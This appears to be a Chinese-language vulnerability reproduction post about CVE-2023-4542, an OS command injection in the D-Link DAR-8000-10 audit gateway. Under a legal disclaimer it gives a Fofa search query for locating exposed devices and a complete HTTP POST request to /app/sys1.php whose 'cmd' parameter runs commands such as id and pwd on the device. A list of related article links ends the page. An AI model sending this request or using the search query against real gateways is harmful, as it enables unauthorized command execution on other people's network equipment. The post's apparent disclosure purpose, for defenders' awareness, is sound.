D-Link DAR-8000操作系统命令注入漏洞(CVE-2023-4542)

免责声明

仅用于技术交流,目的是向相关安全人员展示漏洞利用方式,以便更好地提高网络安全意识和技术水平。

任何人不得利用该文章进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为,责任自负。

该文章仅用于授权测试,任何未经授权的测试均属于非法行为。请在法律许可范围内使用。

作者对使用该文章导致的任何直接或间接损失不承担任何责任。使用此文章的风险由使用者自行承担。

漏洞描述

D-Link DAR-8000是中国友讯(D-Link)公司的上网行为审计网关。

D-Link DAR-8000-10版本存在操作系统命令注入漏洞。

漏洞影响

D-Link DAR-8000-10

漏洞危害

该漏洞源于文件/app/sys1.php的参数id会导致操作系统命令注入。

网络测绘

Fofa: body="DAR-8000-10"


漏洞复现

1. 构造poc

vbnet 复制代码
POST /app/sys1.php HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 6

cmd=id

2. 发送数据包,执行命令

id命令

pwd命令

相关推荐
Andya_net10 分钟前
网络安全 | 深入了解OAuth 2.0原理
安全·web安全·github
是Yu欸38 分钟前
Rust 并发实战:从零构建一个内存安全的“番茄时钟”
开发语言·安全·rust
DKunYu1 小时前
5.网络原理之TCP_IP
网络·tcp/ip·php
半个西瓜.1 小时前
车联网安全:调试接口安全测试.
网络·安全·web安全·网络安全·车载系统
1***y1781 小时前
前端构建工具环境变量安全,避免敏感信息
安全
一位搞嵌入式的 genius1 小时前
HTTP与HTTPS深度解析:从明文传输到安全通信
计算机网络·安全·http·https·网络通信
ooooooctober1 小时前
PHP代码审计框架性思维的建立
android·开发语言·php
Q_Q5110082852 小时前
python+django/flask的宠物用品系统vue
spring boot·python·django·flask·node.js·php
white-persist2 小时前
差异功能定位解析:C语言与C++(区别在哪里?)
java·c语言·开发语言·网络·c++·安全·信息可视化
U***e633 小时前
后端API安全设计
安全